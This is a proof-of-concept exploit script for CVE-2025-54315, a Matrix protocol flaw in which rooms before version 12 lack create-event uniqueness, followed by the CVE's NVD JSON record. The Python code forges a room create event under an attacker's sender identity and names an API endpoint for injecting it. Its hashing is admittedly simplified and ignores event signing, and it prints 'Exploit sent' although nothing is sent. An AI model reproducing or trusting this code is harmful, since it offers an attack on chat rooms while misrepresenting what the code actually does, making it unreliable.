CVE-2025-54315

# CVE-2025-54315 PoC - Matrix Create Event Uniqueness Bypass # This PoC demonstrates how to exploit the lack of create event uniqueness # in Matrix protocol specification before 1.16 (room version < 12) import json import hashlib # Step 1: Construct a malicious create event with forged sender def create_malicious_event(original_event, forged_sender): """ Create a malicious create event that mimics the original but with a different sender field, exploiting the lack of uniqueness check. """ malicious_event = original_event.copy() malicious_event["sender"] = forged_sender # Forge the creator identity # Keep the same type, room_id, and state_key as the original malicious_event["type"] = "m.room.create" malicious_event["state_key"] = "" # create events have empty state_key # Recalculate hashes (simplified for demonstration) event_content = json.dumps(malicious_event, sort_keys=True).encode() malicious_event["hashes"] = { "sha256": hashlib.sha256(event_content).hexdigest() } return malicious_event # Step 2: Simulate state resolution exploit def exploit_state_resolution(room_id, original_create_event, attacker_user_id): """ Exploit the state resolution algorithm by injecting a forged create event into the room state. """ print(f"[*] Targeting room: {room_id}") print(f"[*] Original creator: {original_create_event['sender']}") print(f"[*] Attacker forging as: {attacker_user_id}") # Create the malicious event malicious_event = create_malicious_event(original_create_event, attacker_user_id) # In a real exploit, this event would be sent to the homeserver # via the Matrix client-server API: # PUT /_matrix/client/v3/rooms/{roomId}/state/m.room.create/ # With body: { "creator": attacker_user_id, "room_version": "11" } print(f"[+] Malicious create event constructed:") print(json.dumps(malicious_event, indent=2)) print(f"[!] Exploit sent - awaiting state resolution on target homeserver") return malicious_event # Example usage (for room version < 12) if __name__ == "__main__": original_event = { "sender": "@legitimate_user:matrix.org", "type": "m.room.create", "state_key": "", "content": { "creator": "@legitimate_user:matrix.org", "room_version": "11" }, "room_id": "!exampleRoom:matrix.org" } attacker = "@attacker:evil.example.com" exploit_state_resolution( "!exampleRoom:matrix.org", original_event, attacker )

{"cve": {"id": "CVE-2025-54315", "sourceIdentifier": "[email protected]", "published": "2025-10-02T19:15:31.477", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Matrix specification before 1.16 (i.e., with a room version before 12) lacks create event uniqueness."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-837"}]}], "references": [{"url": "https://github.com/matrix-org/matrix-spec/releases/tag/v1.16", "source": "[email protected]"}, {"url": "https://matrix.org/blog/2025/08/project-hydra-improving-state-res/", "source": "[email protected]"}]}}